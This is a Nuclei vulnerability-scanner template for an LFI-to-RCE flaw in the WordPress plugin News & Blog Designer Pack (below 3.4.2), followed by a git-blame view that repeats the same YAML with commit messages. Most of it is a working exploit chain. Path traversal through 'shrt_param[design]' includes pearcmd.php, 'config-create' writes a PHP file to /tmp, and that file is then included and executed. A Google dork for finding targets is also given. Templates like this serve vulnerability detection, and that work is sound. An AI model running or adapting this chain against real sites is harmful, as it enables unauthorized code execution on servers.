nuclei-templates/http/vulnerabilities/wordpress/blog-designer-pack-rce.yaml

id: blog-designer-pack-rce

info:
  name: News & Blog Designer Pack < 3.4.2 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function inside file bdp-ajax-functions.php.
  reference:
    - https://twitter.com/frycos/status/1717571552470819285
    - https://wordpress.org/plugins/blog-designer-pack/
  metadata:
    verified: true
    max-request: 3
    google-query: inurl:"/wp-content/plugins/blog-designer-pack/"
  tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,rce,intrusive
variables:
  randomstr: "{{randstr_1}}"
  marker: "{{base64(randomstr)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post
      - |
        POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd
      - |
        POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "\"success\":0")'
          - 'contains(body_2,"channel pear.php.net")'
          - 'contains_all(body_3, "{{randomstr}}", "success\":1")'
          - 'contains(header_3, "application/json")'
        condition: and

# digest: 4b0a004830460221008407f451ed9390ea62275a875181e0caf23cc97c7402511f936b841c059a74e3022100ca13afce3dda364f653ad664a1251d7c1d1da42e8c7ee779310772234f781438:922c64590222798bb761d5b6d8e72950
updated matcher & name 2023-10-26 18:11:10 +00:00			`id: blog-designer-pack-rce`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00
			`info:`
updated matcher & name 2023-10-26 18:11:10 +00:00			`name: News & Blog Designer Pack < 3.4.2 - Remote Code Execution`
			`author: iamnoooob,rootxharsh,pdresearch`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00			`severity: critical`
			`description: \|`
			`News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function inside file bdp-ajax-functions.php.`
			`reference:`
			`- https://twitter.com/frycos/status/1717571552470819285`
added metadata 2023-10-26 18:26:48 +00:00			`- https://wordpress.org/plugins/blog-designer-pack/`
			`metadata:`
			`verified: true`
TemplateMan Update [Fri Oct 27 08:59:57 UTC 2023] :robot: 2023-10-27 08:59:57 +00:00			`max-request: 3`
			`google-query: inurl:"/wp-content/plugins/blog-designer-pack/"`
updated matcher & name 2023-10-26 18:11:10 +00:00			`tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,rce,intrusive`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00			`variables:`
			`randomstr: "{{randstr_1}}"`
			`marker: "{{base64(randomstr)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=bdp_get_more_post`
			`- \|`
			`POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd`
			`- \|`
			`POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
updated matcher & name 2023-10-26 18:11:10 +00:00			`- 'contains(body_1, "\"success\":0")'`
			`- 'contains(body_2,"channel pear.php.net")'`
			`- 'contains_all(body_3, "{{randomstr}}", "success\":1")'`
			`- 'contains(header_3, "application/json")'`
			`condition: and`
TemplateMan Update [Fri Oct 27 16:34:45 UTC 2023] :robot: 2023-10-27 16:34:45 +00:00
			`# digest: 4b0a004830460221008407f451ed9390ea62275a875181e0caf23cc97c7402511f936b841c059a74e3022100ca13afce3dda364f653ad664a1251d7c1d1da42e8c7ee779310772234f781438:922c64590222798bb761d5b6d8e72950`